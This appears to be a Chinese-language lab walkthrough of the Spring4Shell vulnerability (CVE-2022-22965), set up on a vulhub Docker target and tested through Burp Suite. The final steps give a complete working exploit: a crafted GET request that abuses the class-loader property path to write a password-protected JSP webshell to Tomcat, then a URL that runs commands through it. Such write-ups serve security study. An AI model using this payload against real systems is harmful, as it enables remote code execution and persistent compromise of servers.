Java 框架安全:Spring 漏洞序列.(CVE-2022-22965)

什么叫 Spring 框架.

Spring 框架是一个用于构建企业级应用程序的开源框架。它提供了一种全面的编程和配置模型,可以简化应用程序的开发过程。Spring 框架的核心特性包括依赖注入(Dependency Injection)、面向切面编程(Aspect-Oriented Programming)、声明式事务管理(Declarative Transaction Management)等。依赖注入是 Spring 框架的核心概念之一,它通过将对象之间的依赖关系外部化,使得对象之间的协作更加灵活和可测试。Spring 框架提供了多种方式来实现依赖注入,包括构造函数注入、Setter 方法注入和字段注入。


目录:

[什么叫 Spring 框架.](#什么叫 Spring 框架.)

[开启 漏洞 靶场:](#开启 漏洞 靶场:)

(1)查看目录:

[(2)启用 vulhub 漏洞:](#(2)启用 vulhub 漏洞:)

[(3)进行浏览:主机的 8080 端口.](#(3)进行浏览:主机的 8080 端口.)

[进行 漏洞 测试:](#进行 漏洞 测试:)

第一步:设置代理服务器

(1)设置代理服务器

[(2) 新建代理服务器,选择手动代理](#(2) 新建代理服务器,选择手动代理)

[(3)使用 刚刚设置的代理.](#(3)使用 刚刚设置的代理.)

第二步:执行进行抓包.

[(1)打开Burp,点击代理 设置监听的IP地址和端口](#(1)打开Burp,点击代理 设置监听的IP地址和端口)

第三步:进行漏洞测试.


开启 漏洞 靶场:

Web安全:iwebsec || vulhub 靶场搭建.(各种漏洞环境集合,一键搭建漏洞测试靶场)_iwebsec靶场-CSDN博客


(1)查看目录:

复制代码
(1)cd vulhub
 
(2)ls


(2)启用 vulhub 漏洞:

复制代码
(1)cd spring                     // 切换到对应的漏洞目录.
 
(2)cd CVE-2022-22965              // 切换到对应的漏洞版本.

(3)docker-compose build           // 建立容器

(4)docker-compose up -d           //   启用漏洞环境.


(3)进行浏览:主机的 8080 端口.


进行 漏洞 测试:

第一步:设置代理服务器

(1)设置代理服务器(我用的是:OWASP浏览器,也可以用别的浏览器 设置代理服务器就行)


(2) 新建代理服务器,选择手动代理 设置127.0.0.1(为本地的IP地址),设置代理的端口8080


(3)使用 刚刚设置的代理.


第二步:执行进行抓包.

(1)打开Burp,点击代理 设置监听的IP地址和端口(就是刚刚浏览器设置的代理,127.0.0.1(是本地的IP地址),8080(是监听的端口))


(2)进行访问漏洞的链接.(使用 Burp抓包.)

复制代码
GET /?class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bc2%7Di%20if(%22j%22.equals(request.getParameter(%22pwd%22)))%7B%20java.io.InputStream%20in%20%3D%20%25%7Bc1%7Di.getRuntime().exec(request.getParameter(%22cmd%22)).getInputStream()%3B%20int%20a%20%3D%20-1%3B%20byte%5B%5D%20b%20%3D%20new%20byte%5B2048%5D%3B%20while((a%3Din.read(b))!%3D-1)%7B%20out.println(new%20String(b))%3B%20%7D%20%7D%20%25%7Bsuffix%7Di&class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT&class.module.classLoader.resources.context.parent.pipeline.first.prefix=tomcatwar&class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat= HTTP/1.1
Host: 192.168.32.132:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) 	AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 		Safari/537.36
Connection: close
suffix: %>//
c1: Runtime
c2: <%
DNT: 1


第三步:进行漏洞测试.

(1)访问刚才上传的 JSP webshell,并执行任意命令.

复制代码
http://172.16.10.19:8080/tomcatwar.jsp?pwd=j&cmd=id

相关推荐
小吕学编程4 分钟前
Spring Boot + Kafka 消息队列从零到落地
java·spring boot·kafka
CertiK9 分钟前
重磅 | CertiK《Hack3d:2025第一季度安全报告》(附报告全文链接)
安全·web3·区块链·智能合约
nlog3n10 分钟前
Java 代理模式 详解
java·开发语言·代理模式
Seven9723 分钟前
电商平台中订单未支付过期如何实现自动关单?
java
suimeng631 分钟前
Java的Selenium的特殊元素操作与定位之模态框
java·自动化测试·selenium
浩浩测试一下38 分钟前
内网渗透(杂项集合) --- 中的多协议与漏洞利用技术(杂项知识点 重点) 持续更新
安全·web安全·网络安全·系统安全·密码学·安全架构
车载测试工程师1 小时前
ARXML文件解析-2
java·服务器·网络·数据库·经验分享·网络协议·车载系统
javaisC1 小时前
数据结构----------顺序查找,折半查找和分块查找(java实现)
java·数据结构·算法
振鹏Dong1 小时前
搜索树——AVL、红黑树、B树、B+树
java
捡田螺的小男孩1 小时前
新来的技术总监,把DDD落地的那叫一个高级优雅!
java·后端